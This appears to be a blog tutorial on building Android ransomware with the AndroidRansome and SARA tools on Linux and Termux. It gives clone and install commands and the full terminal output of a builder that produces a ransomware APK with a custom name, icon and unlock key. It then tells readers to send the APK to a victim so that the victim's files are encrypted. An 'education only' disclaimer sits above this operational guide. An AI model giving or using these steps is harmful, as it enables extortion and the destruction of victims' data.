Android ransomware tool - Encrypt Android files

Android ransomware tool – In this article I’m going to teach you how to create an android ransomware tool on Linux and Termux.

Table of Contents

What is ransomware?

Ransomware is a type of malicious software (malware) that usually uses encryption to threaten the release of data or computer systems, or block access to data or computer systems until the victim pays the attacker a ransom. If the victim does not pay on time, the data will disappear forever.

Nowadays, ransomware attacks are too common. Large companies in North America and Europe have become victims of this situation. Cybercriminals target any consumer or business, and victims come from various industries.

Several government agencies, including the FBI, advise against paying ransoms to avoid starting a ransomware cycle, similar to Project No More Ransomware. In addition, perhaps half of the ransomware victims may face repeated ransomware attacks.

How to install the android ransomware Tool

The ransomware tool is available on both devices termux and Linux. We will discuss both the installation process and usage

This is an Alert
This tool is only for educational purposes. If you use this tool for other purposes except for education we will not be responsible in such cases

Install the Android ransomware tool on Linux

Step 1:

First, we need to download ransomware tool so type the below command on your terminal.

									git clone				
Android ransomware tool – Encrypt Android files
Download the tool

Step 2:

Now change your directory root to AndroidRansome so type the below command

									cd AndroidRansome				
Android ransomware tool – Encrypt Android files
Change the directory

Step 3:

After that install, the ransomware tool on our Linux so types the below command on our Linux terminal.

									sudo bash				
Install the android ransomware tool

The installation process took time more than 5 minutes otherwise depending upon your internet speed.

Make ransomware payload

After completed the installation run the android ransomware tool with the below command.


Once you execute the above command it will ask app name, app icon ( should be png ), title, unlock key, and description. so you fill in the all required details.

									ANDROID RANSOME[!] Use this tool for education purpose only[!] Do you agree (y/n): y    AndroidRansome is a Simple Android Ransomware Attack    The user can customize the App Icon, Name, Key and others.    If you forgot the unlock key, just restart your phone !> Use n for newline and CTRL + C for exit-------------------------------------------* SET app_icon (PNG only): /home/raj/Desktop/* SET app_name: Hacking* SET title: Errorsfind* SET description: this tool for education pupose only* SET unlock key: Errorsfind* Building your ransomware APK's ...-------------------------------------------Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=trueI: Using Apktool 2.5.0-dirty on AndroidRansome.apkI: Loading resource table...I: Decoding AndroidManifest.xml with resources...I: Loading resource table from file: /home/raj/.local/share/apktool/framework/1.apkI: Regular manifest package...                                                                                   I: Decoding file-resources...                                                                                    I: Decoding values */* XMLs...                                                                                   I: Baksmaling classes.dex...                                                                                     I: Copying assets and libs...                                                                                    I: Copying unknown files...                                                                                      I: Copying original files...                                                                                     I: Using strings AndroidRansome/res/values/strings.xml                                                           I: Using smali MyService$100000000.smali                                                                         I: Adding name with Hacking                                                                                      I: Adding title with Errorsfind                                                                                  I: Adding description with 35 words                                                                              I: Adding unlock key with Errorsfind                                                                             I: Adding icon with size: 48x48                                                           I: Adding icon with size: 96x96                                                           I: Adding icon with size: 72x72                                                           I: Adding icon with size: 144x144                                                         Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true                                    I: Using Apktool 2.5.0-dirty                                                                                     I: Checking whether sources has changed...                                                                       I: Smaling smali folder into classes.dex...                                                                      I: Checking whether resources has changed...                                                                     I: Building resources...                                                                                         W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/linux/aapt_64 (defaulting to $PATH binary)                                                                                   I: Building apk file...                                                                                          I: Copying unknown files/dir...                                                                                  I: Built apk...                                                                                                  > Result saved as:  hacking.apk                             				

After making the payload sent to the victim. if the victim installs our payload all that victim data will be encrypted.

Don’t forget the unlock key because after encryption the unlock key is most important to decrypt.

Install the android ransomware Tool on Termux?


  1. Imagemagick
  2. Tsu
  3. Python package
  4. Pillow python module

How to install imagemagick?

apt-get install imagemagick -y

How to install tsu?

apt-get install tsu -y

How to install python package?

pkg install python && pkg install python2


apt-get install python -y

How to install pillow module?

pip3 install Pillow

Installation process

Now you just type the following command on your termux application one by one.

									git clone && cd SARAtsubash installtermux.shpython3				

After that, we need to create a ransomware payload. The payload creation process will be the same as for Linux.

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